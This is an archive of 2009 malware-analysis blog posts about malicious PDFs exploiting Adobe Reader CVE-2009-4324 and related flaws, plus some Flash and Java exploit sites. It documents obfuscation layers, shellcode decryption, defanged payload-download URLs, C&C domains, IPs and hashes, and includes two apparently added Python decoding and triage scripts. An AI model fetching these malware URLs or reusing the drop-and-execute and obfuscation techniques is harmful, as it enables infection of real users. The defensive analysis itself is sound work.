Tuesday, December 29, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.6 – from Taiwan govs with low detection


Starting from the contagiodump.blogspot.com report, this post analyzes a PDF with characteristics different from those seen in the previous posts. The document was collected as a mail attachment, as shown in the contagiodump blog:

[screenshot s004]

(http://contagiodump.blogspot.com/2009/12/dec-29-cve-2009-4324-adobe-0-day.html)

As a first step, the file was opened with an editor (Notepad++). As always there are some streams that must be inflated to get the code in the clear. But a note of interest was discovered (since I'm not a PDF specs guru) in the following statement:

[screenshot s001]

In the screenshot above there is a red note that is easily confirmed with this Google query:

[screenshot s002]

The /DL token is explained in the PDF specs at the following link: http://www.adobe.com/devnet/pdf/pdf_reference.html
In addition, the red note is confirmed by analyzing the Metasploit module for generating exploitable PDF files, as shown in the following screenshot:

[screenshot s003]

(From http://www.packetstormsecurity.org/0911-exploits/adobe_pdf_embedded_exe.rb.txt)

In conclusion, the PDF stub may have been generated with the Metasploit module. Returning to the analysis, using pdf_inflater the only clear JavaScript code file obtained is the following:

[screenshot s005]

IMHO this code uses a "not so bad" method that achieves a good low-detection rate.

The shellcode (variable name "sc") is obtained by the function urpl at line 1, which replaces the "Z" char with "u", giving the following UCS2 stream:

[screenshot s006]

Using Malzilla, the UCS2 stream was converted to a hex stream ready to be posted at http://sandsprite.com/shellcode_2_exe.php.


When analyzing the shellcode, the first step is to bypass an anti-debugging technique. For this, IDA Pro's "F7" (step into) single-stepping mode was used; don't use "F8" (step over). (Many thanks to http://whsbehind.blogspot.com/ for the hints.) In this mode the first piece of runtime code is decrypted (XOR with 0xBCD3DBE7 held in EDX), and the following pieces in the subsequent steps:

[screenshot s007]

And the following screenshot is one step before EIP is set to the new value and the jump is taken:

[screenshot s008]

The assembly code now seems interpretable by IDA:

[screenshot s009]

For the shellcode, it is possible to analyze the runtime code up to a certain point. After that one must continue with static analysis of the code, and in some cases this is not a good approach. The best approach is to run Adobe Reader under a debugger, open the malicious PDF file, and identify the pieces of code involved in the exploitation and in the execution of the shellcode. By way of example, the next screenshot shows a file size check performed by the standalone shellcode. In that picture the shellcode is executed outside the Adobe Reader context, or if you prefer in "standalone mode". In this condition there are no open PDF file handles, so, as in this case, running the standalone shellcode leads to an infinite loop. So, in conclusion, it is necessary to load the malicious PDF in an Adobe Reader context and track the behavior with an application debugger.

[screenshot s010]

127728 bytes is the size of the PDF file:

[screenshot]

Analyzing the shellcode under the Adobe Reader context, the following code was found, which is the starting point for a better analysis:

[screenshot s011]

It shows the code area of the Multimedia.API plugin where the method that triggers the issue is handled. The screenshot above potentially contains info that may be used as a starting point for writing a "third-party" patch.

For other behaviors like network traffic, dropped files, and system activity please check http://contagiodump.blogspot.com/2009/12/dec-29-cve-2009-4324-adobe-0-day.html.

Adobe CVE-2009-4324 in the wild - (0day) - part 0.5 – yet another Elenore pack

From the following URL (thanks to malwaredomainlist):

hxxxxp://macaples.in/my_usa/pdf.php 

A PDF was downloaded that looks similar to those analyzed in the previous post. Again the JavaScript code inflated from the PDF is spread over 4 files. One of them allows the clear JavaScript code to be obtained; in this case the search is for "lka1" and the replacement is "%":

[screenshot shot001]

The obfuscated exploit code appears as in the following shots:

[screenshot shot002]

obtaining the following code:

[screenshots s1, s2, s3, s4]

As shown, the following issues are exploited:

CVE-2009-4324 by function printd()
CVE-2008-2992 by function util_printf()
CVE-2007-5659 by function collab_email()
CVE-2009-0927 by function collab_geticon()

The shellcode, once executed, contacts the following URL:

[screenshot shot003]

hxxxxxxxxxxxp://macaples.in/my_usa/load.php?spl=pdf_pack

to drop and execute the following binary:

md5 bbaf68dc0071e0c7ff1f5fc6aa711279

As reported by ThreatExpert, there is network traffic to the IP 115.100.250.114.

[screenshot s5]

More info about this domain from Robtex: http://www.robtex.com/dns/sport-lab.cn.html#shared

Monday, December 28, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.4 - yourenter.com

 
The following URL was reported by malwaredomainlist.com as a PDF exploiter:
 
hxxxxxxp://yourenter.com/pdf.php  (replace hxxxxxxp with http at your risk).

Checked with wepawet, the PDF appears "benign" (http://bit.ly/7IZ9SH), so a minimal manual analysis was started. Following the usual steps with pdf_inflater, the following clear JavaScript code was obtained:

1.tmp:

2.tmp:

3.tmp:

4.tmp:

In other words, the pieces of code above perform a search-and-replace of the string "kru pop 32" with "%". This step produces JavaScript code encoded in the form "%<value>", which was decoded with the help of Malzilla, obtaining this code:

As shown above, the result is a PDF exploiter that tries to trigger the following issues:

CVE-2009-4324 by function printd() - line 10
CVE-2008-2992 by function util_printf() - line 32
CVE-2007-5659 by function collab_email() - line 58
CVE-2009-0927 by function collab_geticon() - line 84
 
The shellcode is the same for each function (lines 12, 34, 60, 89 in the code above). With Malzilla the following result was obtained:



So, once the issue is successfully triggered, the shellcode tries to drop and execute the binary from:
hxxxxxxp://yourenter.com//load.php?spl=pdf_pack  (as already reported by malwaredomainlist.com)
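The two decoding steps these posts do by hand, as an added Python example (not code from the page, from Malzilla or from any kit): undoing the token-for-escape substitution ("lka1" / "kru pop 32" standing for "%" here, "Z" standing for "u" in the part 0.6 shellcode) and then turning the %uXXXX stream into the raw bytes that a shellcode_2_exe-style tool takes. The sample strings are constructed; the shellcode sample only reproduces the opening getpc bytes of the part 0.6 hex stream.

```python
import re

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
FNSTENV_GETPC = bytes.fromhex("d97424f4")  # fnstenv [esp-0Ch], a common getpc prologue


def strip_token(src, token, replacement):
    """Undo the search-and-replace layer: the kits hide the escape character behind
    a token ("lka1" or "kru pop 32" stand for "%", "Z" stands for "u")."""
    return src.replace(token, replacement)


def unescape_to_bytes(s):
    """Turn a JavaScript unescape()-style string into the bytes it occupies in memory.
    %uXXXX is one UTF-16 code unit stored little-endian (low byte first), %XX is one
    byte; text between escapes is copied through unchanged."""
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(s):
        out += s[pos:m.start()].encode("latin-1")
        if m.group(1) is not None:
            unit = int(m.group(1), 16)
            out += bytes([unit & 0xFF, unit >> 8])
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return bytes(out)


def decode_layers(src, token, replacement):
    """Both steps in one go; the hex form is what shellcode_2_exe-style tools accept."""
    raw = unescape_to_bytes(strip_token(src, token, replacement))
    return raw, raw.hex()


def has_fnstenv_getpc(raw):
    """Cheap triage: a fnstenv-based getpc among the first bytes is the usual prologue
    of a self-decrypting decoder stub, the kind single-stepped in IDA in part 0.6."""
    return FNSTENV_GETPC in raw[:16]


# Constructed samples, not the page's strings. SAMPLE_JS hides "app.alert" behind the
# "lka1" token; SAMPLE_SC hides a %u-encoded stub whose first bytes decode to
# fxch st(0); fnstenv [esp-0Ch], the classic getpc opening.
SAMPLE_JS = "lka161lka170lka170lka12Elka161lka16Clka165lka172lka174"
SAMPLE_SC = "%Zc8d9%Z74d9%Zf424"

if __name__ == "__main__":
    print(unescape_to_bytes(strip_token(SAMPLE_JS, "lka1", "%")))
    raw, hx = decode_layers(SAMPLE_SC, "Z", "u")
    print(hx, has_fnstenv_getpc(raw))
```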
 
The ThreatExpert analysis can be found at: http://www.threatexpert.com/report.aspx?md5=1f5bf5bf2eb28ad8d5808e814f12ce02

Some network info related to the starting URL:
[screenshots rob001, rob002]
 
Whois:
inetnum: 217.23.10.0 - 217.23.10.255
netname: WORLDSTREAM
descr: WorldStream IPv4.17
country: NL
admin-c: WS1670-RIPE
tech-c: WS1670-RIPE
status: ASSIGNED PA
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered

Wednesday, December 23, 2009

ebnvnos.com - Flash Java and PDF vulnerabilities in the wild - Waledac - part 0.1

Another URL (many thanks to mdl for the reminder) related to ebnvnos.com:

hxxxxxxxp://ebnvnos.com/lib1/dontLayout.pdf

and the related wepawet analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=629a6aa81a426024099807b8c8817063&t=1261430262&type=js

which seems to trigger CVE-2009-0927.

So, in conclusion, nothing new except the little-known URL.

ebnvnos.com - Flash and Java vulnerabilities in the wild - Waledac - part 0

The domain ebnvnos.com seems related to one of the spreading stages, which exploits something in Adobe Flash Player and Java. The usual Robtex screenshot helps to know a bit more about it:



Whois 217.23.12.79:

inetnum: 217.23.12.0 - 217.23.12.255
netname: WORLDSTREAM
descr: WorldStream IPv4.19
country: NL
admin-c: WS1670-RIPE
tech-c: WS1670-RIPE
status: ASSIGNED PA
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered

role: WORLDSTREAM DBM
address: Honderdland 111F
address: 2676LT Maasdijk
phone: +31174712117
fax-no: +31174512310
e-mail: info@worldstream.nl
admin-c: DV1495-RIPE
tech-c: DV1495-RIPE
nic-hdl: WS1670-RIPE
mnt-by: MNT-WORLDSTREAM
source: RIPE # Filtered


The malicious URL is:
hzzzzzzp://ebnvnos.com/lib1/ (search and replace hzzzzzzp with http at your risk)

The particularity of this site is that once you request the URL shown, you must wait an undisclosed time before making other HTTP requests. It can be inferred that the admin uses a "hit and run" approach to make behavior analysis more difficult. The next times the URL was requested, the HTTP session was redirected to Google.

To keep track of the facts, Wireshark was used. In this way an exploiter was discovered that tries to render 3 resources:

- a Java class named isWith.class
- an SWF object named ametMany.swf
- another SWF object named goingBook.swf

The following shots show the HTTP traffic related to the three objects above:

An abstract of the exploiter code:




The HTTP requests once the exploiter has run:





For a quick analysis, wepawet was used on goingBook.swf with the following result:
http://wepawet.cs.ucsb.edu/view.php?hash=3e107aa57b86deea966ab75c587f310b&type=swf

And a pointer to VirusTotal:
http://www.virustotal.com/analisis/9916df6c1e603ec297ee0489ef8774cce263860b48c2faf93917739d3ac6afe5-1261592005

A not so good analysis by Anubis:
http://anubis.iseclab.org/?action=result&task_id=152965b4ce503e7b4b9f2caf56bddf37b&format=html

The Anubis HTTP requests appear to be filtered by the host above.

Using an exploitable system and calling the malicious URL above, the following binaries were dropped:

_ex-08.exe (md5 708aa73ace4e76988b8f295a2ed619cb)
http://www.threatexpert.com/report.aspx?md5=708aa73ace4e76988b8f295a2ed619cb
A note of interest is the list of IPs contacted by the binary above:


(generated with the support of the Cymru whois service)
These look like a fast-flux architecture.

32782224.exe (md5 770199bb1a8aa78ccccd135656cc8ca7)
http://www.threatexpert.com/report.aspx?md5=770199bb1a8aa78ccccd135656cc8ca7

153.exe (md5 9d702b6292dff05453fb475a08842a2c)
http://www.threatexpert.com/report.aspx?md5=9d702b6292dff05453fb475a08842a2c
This binary may be evidence of a Waledac connection.

Saturday, December 19, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.3 - merry christmas from (for) Taiwan ? :)

Again from contagiodump... (the merry christmas PDF): the following screenshot shows the obfuscated JavaScript code extracted from one of the stream objects within the PDF 955bade419a9ba9e5650ccb3dda88844:



The PDF (955bade419a9ba9e5650ccb3dda88844) generates (if the issue is triggered successfully) a binary that becomes an .exe file named "temp.exe" in the path "C:\Documents and Settings\Admin\Local Settings".
The following link is the Anubis report for the exe:
http://anubis.iseclab.org/?action=result&task_id=18d9ed8740a9d94b469c492638799bb60&format=html

As shown in the Anubis analysis, the dropper creates another binary named "msupdater.exe" located in "C:\Documents and Settings\Admin\Local Settings\Application Data". The Anubis report for "msupdater.exe":
http://anubis.iseclab.org/?action=result&task_id=194fa0dfd87d1f9742d334f13b27666d3&format=html

Once msupdater.exe is executed, the following (really strange) traffic is generated:



As shown in the screenshot above (sorry for the copy in the labs folder :) ), the IP of interest (used for strange HTTP "ping" traffic as well as a sort of port knocking) seems to be 140.112.40.7. From Robtex the following graph was obtained:




Whois 140.112.40.7:

inetnum: 140.112.0.0 - 140.112.255.255
netname: TANET
descr: Taiwan Academic Network
descr: Ministry of Education computer Center
descr: 12F, No 106, Sec. 2, Heping E. Rd., Taipei
country: TW
admin-c: TA61-AP
tech-c: TA61-AP
mnt-by: MAINT-TW-TWNIC
changed: hostmaster@twnic.net.tw 20030908
changed: hm-changed@apnic.net 20040926
status: ALLOCATED PORTABLE
source: APNIC

Another interesting IP (observed during the launch of msupdater.exe) shown in the Wireshark capture above is 209.85.227.104, which resolves to wy-in-f104.1e100.net.


AS15169 is google.com,

so 209.85.227.104 is Google :)


Anyway, yet another reverse engineering analysis of this issue can be found at
http://whsbehind.blogspot.com

Friday, December 18, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.2 - shellcode and site down

It seems that the spreading infrastructure is down (or maybe the admins have changed domains or paths). Anyway, the following screenshots show the shellcode embedded in one of the well-known PDFs (thank you contagiodump.blogspot.com). To inflate the deflated PDF streams the PDF_streams_inflater tool was used (no longer available from the Malzilla site):

http://www.mc-antivirus-test.com/modules/PDdownloads/singlefile.php?cid=6&lid=25
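The inflate step used throughout these posts, as an added Python example (not the PDF_streams_inflater or pdf_inflater tool, nor code from the page): it walks the stream objects of a PDF, inflates the /FlateDecode ones, and reports streams that carry JavaScript or the /DL key that part 0.6 ties to Metasploit output. The sample PDF is constructed inline and the regex-based object walk is a simplification of real PDF parsing.

```python
import re
import zlib

# One "N G obj << dict >> stream ... endstream" unit. The tempered dot in the
# dictionary group keeps a match from running past an "endobj" into the next
# object, and the non-greedy data group stops at the first "endstream".
STREAM_RE = re.compile(
    rb"(\d+)\s+(\d+)\s+obj\s*(<<(?:(?!endobj).)*?>>)\s*stream\r?\n(.*?)\r?\nendstream",
    re.DOTALL,
)

# Dictionary keys worth reporting: script carriers and the /DL key that the
# part 0.6 post associates with Metasploit's adobe_pdf_embedded_exe output.
FLAG_KEYS = (b"/JS", b"/JavaScript", b"/DL", b"/EmbeddedFile")
JS_HINT_RE = re.compile(rb"unescape\s*\(|eval\s*\(|\.replace\s*\(")


def inflate_streams(pdf_bytes):
    """Return [(object number, dictionary, decoded data)] for every stream object.
    /FlateDecode streams are inflated; a corrupt stream yields data=None instead of
    aborting, because malicious PDFs frequently carry deliberately broken objects."""
    found = []
    for m in STREAM_RE.finditer(pdf_bytes):
        objnum, dictionary, raw = int(m.group(1)), m.group(3), m.group(4)
        if b"/FlateDecode" in dictionary:
            try:
                data = zlib.decompress(raw)
            except zlib.error:
                # tolerate a truncated tail or trailing junk: keep what inflates
                try:
                    data = zlib.decompressobj().decompress(raw) or None
                except zlib.error:
                    data = None
        else:
            data = raw
        found.append((objnum, dictionary, data))
    return found


def triage(pdf_bytes):
    """Flag streams that carry one of FLAG_KEYS in their dictionary or whose decoded
    body uses the unescape/eval/replace primitives the kits on this page rely on.
    Returns [(object number, list of reasons, data)]."""
    report = []
    for objnum, dictionary, data in inflate_streams(pdf_bytes):
        reasons = [k for k in FLAG_KEYS if k in dictionary]
        if data is not None and JS_HINT_RE.search(data):
            reasons.append(b"js-heuristic")
        if reasons:
            report.append((objnum, reasons, data))
    return report


def build_sample_pdf():
    """Constructed minimal PDF (not from the page): a Flate-compressed stream holding
    Z-for-u obfuscated JavaScript, a plain stream, and a dictionary-only object."""
    js = b'var sc = "%Z9090%Z9090".replace(/Z/g, "u"); eval(unescape(sc));'
    comp = zlib.compress(js)
    return b"".join([
        b"%PDF-1.5\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
        b"5 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp)
        + comp + b"\r\nendstream\nendobj\n",
        b"6 0 obj\n<< /Length 11 >>\nstream\nhello world\r\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    for objnum, reasons, data in triage(build_sample_pdf()):
        print(objnum, reasons, data)
```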

The dissected PDF has the following MD5: 35e8eeee2b94cbe87e3d3f843ec857f6, but it seems that 61baabd6fc12e01ff73ceacc07c84f9a also uses the same shellcode.


So, the first step to retrieve useful code is a simple override of the JavaScript eval method:




The following screenshot shows some clear strings within the shellcode:



Maybe a runtime check for Kaspersky tools and a check for Kingsoft security tools, plus the evidence of the user agent AdobeUpdate (as documented in the F-Secure post on the subject) used for the HTTP request.

To quickly obtain a PE binary from the shellcode, the following was used:
http://sandsprite.com/shellcode_2_exe.php

The check above at runtime:



The XML code that defines an embedded RAR file, discovered inside 35e8eeee2b94cbe87e3d3f843ec857f6:




The Anubis analysis of the RAR (an exe inside a RAR-compressed archive) extracted from the PDF above:
http://anubis.iseclab.org/?action=result&task_id=106dc12f361a9afd4156862d5f34f1c77&format=html


The RAR contents:



The RAR-compressed exe file is run by the shellcode under certain conditions.


Tuesday, December 15, 2009

Adobe CVE-2009-4324 in the wild - (0day) - part 0.1 - browsing C&Cs

"Playing" with one of the URLs run by a C&C (see the previous post http://extraexploit.blogspot.com/2009/12/adobe-cve-2009-4324-in-wild.html) you can access some paths containing folder names that (probably) match infected hostnames. The following screenshots document the browsing of dailysummary.net.

The root path:



The host names list:




The content (probably encrypted file):



The root path for somus.net:



Adobe CVE-2009-4324 in the wild - (0day) - part 0

A quick analysis (This post is under update):


Something more from other sites:

A detailed CVE-2009-4324 analysis
(many thanks vrt-sourcefire team :) ) :
VRT-Sourcefire
http://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

Other interesting analyses from contagiodump.blogspot.com (many thanks contagio :)):
http://contagiodump.blogspot.com/2009/12/adobe-cve-2009-4324-posts-with-infected.html
http://contagiodump.blogspot.com/2009/12/zero-day-pdf-attack-of-day-2-interview.html

Malwaredomainlist
http://www.malwaredomainlist.com/forums/

Bad news about CVE-2009-4324:
New exploit in the wild capitalizes on flaw in JavaScript function, patch to come January 12 (Darkreading)
http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=222002143

F-Secure analysis (probably after this initial post :) ) of the binary above (sorry, see below :) ) with some info about the HTTP C&C:
http://www.f-secure.com/weblog/archives/00001836.html

Adobe PSIRT Blog
http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html


Metasploit module:
http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb


My not so linear analysis:

The malicious PDF is spread via email attachments. The following URL seems related to this issue (used by Trojan.Pidief.h as a dropper; low AV detection rate at the first VirusTotal submission):
hzzzzzp://foruminspace.com/documents/dprk/ab.exe (replace hzzzzzp with http at your risk)

Virustotal analysis
https://www.virustotal.com/analisis/d6afb2a2e7f2afe6ca150c1fade0ea87d9b18a8e77edd7784986df55a93db985-1260858538

ThreatExpert analysis:
http://www.threatexpert.com/report.aspx?md5=686738eb5bb8027c524303751117e8a9


Robtex response for the malicious domain above (foruminspace.com):

A bit more:



Whois 124.217.238.101:

inetnum: 124.217.224.0 - 124.217.255.255
netname: PIRADIUS-NET
descr: PIRADIUS NET
country: MY
admin-c: PA124-AP
tech-c: PA124-AP
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
mnt-by: APNIC-HM
mnt-lower: MAINT-MY-PIRADIUS
changed: hm-changed@apnic.net 20071217
source: APNIC

person: PIRADIUS NET Administrator
nic-hdl: PA124-AP
e-mail: abuse@piradius.net
address: PIRADIUS NET
address: Unit 21-3A, Level 21
address: Plaza DNP 59, Jalan Abdullah Tahir
address: Taman Century Garden
address: 80300 Johor Bahru, Johor
address: Malaysia
phone: +607 334 8605
fax-no: +607 334 8605
country: MY
changed: admin@piradius.net 20071003
mnt-by: MAINT-MY-PIRADIUS
source: APNIC


Some pieces of reversing related to "ab.exe":

The list of "unfriendly" processes searched for in memory:



An anti-debugging technique discovered in the dropper (thanks to 0xff for the support) and other pieces of the checking stage in the name of a "good local malware ecosystem":



An HTTP command from the infected host to the HTTP-based C&C:




The command that was sent from the "infected" host:




The commands are sent to two hostnames: dailysummary.net and somus.net.





A note of interest is the MX record that points at the C&C hostname. The following pictures (again generated by Robtex) show the impressive number of domains assigned to the IP 124.217.238.192 (dailysummary.net):


(generated from http://www.robtex.com/ip/124.217.238.192.html#graph)

and to the IP 124.217.238.100 (somus.net):

(generated from http://www.robtex.com/ip/124.217.238.100.html#graph)